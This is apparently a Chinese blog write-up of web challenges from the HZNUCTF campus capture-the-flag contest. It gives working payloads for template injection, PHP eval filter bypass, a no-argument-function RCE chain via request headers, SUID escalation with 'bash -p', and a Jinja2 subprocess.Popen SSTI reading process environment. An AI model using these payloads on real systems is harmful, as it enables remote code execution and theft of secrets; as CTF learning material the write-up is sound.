HZNUCTF -- web

HZNUCTF第五届校赛实践赛初赛 Web方向 WriteUp-CSDN博客

ezssti

下载文件

访问 /login

可由源代码中看到 Eval 函数 ,可以任意命令执行

按照格式,可执行命令

POST :name={{.Eval "env"}} 可以得到flag

(尝试ls 只能列出当前目录,列不出根目录,无法cat ,所以尝试 env命令)

真亦假,假亦真(HZNU版)

eval($_POST[1]) 可以命令执行

但是 cat /flag 会显示出一个假的flag

尝试了特别久,找了很多目录文件都没有
cat /*g 可以找到真的flag ,

是做了一个类似前端的验证啥的,只要出现了 flag 或者 /f* 啥的就会返回那个假的的flag

sql2login

可能是题目有问题,直接注册账号再登陆就可以直接得到flag

不需要sql注入

suid

php 复制代码
 <?php
highlight_file(__FILE__);// var_dump($_POST);if (isset($_POST["s_1.1"])) {
    echo "level 1"."<br>";
    if (';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_POST['cmd'])) {
        if (!preg_match('/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i', $_POST['cmd'])) {
            echo 'success!'.'<br data-tomark-pass>';
            eval($_POST['cmd']);
        }
    }
} else {
    echo "nonono 1";
} nonono 1

无参数函数进行命令执行

抓包处理

POST传参:
s[1.1=&cmd=eval(pos(apache_request_headers()));

bp抓包后构造一个请求头,放在第一个,名字随便

比如:flag:system("");

这样包裹了eval 就可以进行命令执行了

解释:

要传参 s_1.1 因为php特性的关系,正常传不了 点号 .

,需要特殊处理 ,[ 就被转换成 _ ,且后面的 点号 . 也可以正常传了

所以 传参 s_1.1 写为 --> s[1.1

apache_request_headers() : 会返回请求头的信息

pos() : 会把第一个信息取出来回显

eval() : 可将回显出来的信息当作代码执行

但是这道题可以列出来目录,无法读取文件,没有权限,需要提权

看了wp后,提权,只需要加上**bash -p -c ,**就可以拥有权限读取文件了

php 复制代码
请求头:
A: bash -p -c "cat /flag"


传参:
cmd=system(current(array_reverse(getallheaders())));&s[1.1=1

炼狱waf-S

尝试好久,太菜了,一直绕不过去

直接看wp学习:

1、利用subprocess.Popen来执行命令

{{[].class.base.subclasses()[351]('cat /proc/1/en*',shell=True,stdout=-1).communicate()[0].strip()}}

2、直接利用引号拼接(非预期解)

(我开始做的时候也是想拼接绕过来着,一直没成功,感觉应该是格式的问题,失败了几次也就直接放弃了,感觉不会这么简单的直接就是引号拼接)

相关推荐
许白掰41 分钟前
Linux入门篇学习——Linux 编写第一个自己的命令
linux·运维·数据库·嵌入式硬件·学习
程序员Xu42 分钟前
【OD机试题解法笔记】连续出牌数量
笔记·算法·深度优先
生如夏花℡1 小时前
HarmonyOS学习记录4
学习·华为·harmonyos
彤银浦1 小时前
Web学习笔记2
笔记·学习
长风破浪会有时呀1 小时前
Git 学习笔记
笔记·git·学习
偷偷的卷1 小时前
【算法笔记 day three】滑动窗口(其他类型)
数据结构·笔记·python·学习·算法·leetcode
大白的编程日记.2 小时前
【计算机基础理论知识】C++篇(二)
开发语言·c++·学习
Chef_Chen2 小时前
从0开始学习R语言--Day42--LM检验
学习
C语言小火车2 小时前
野指针:C/C++内存管理的“幽灵陷阱”与系统化规避策略
c语言·c++·学习·指针
凤年徐2 小时前
【数据结构】时间复杂度和空间复杂度
c语言·数据结构·c++·笔记·算法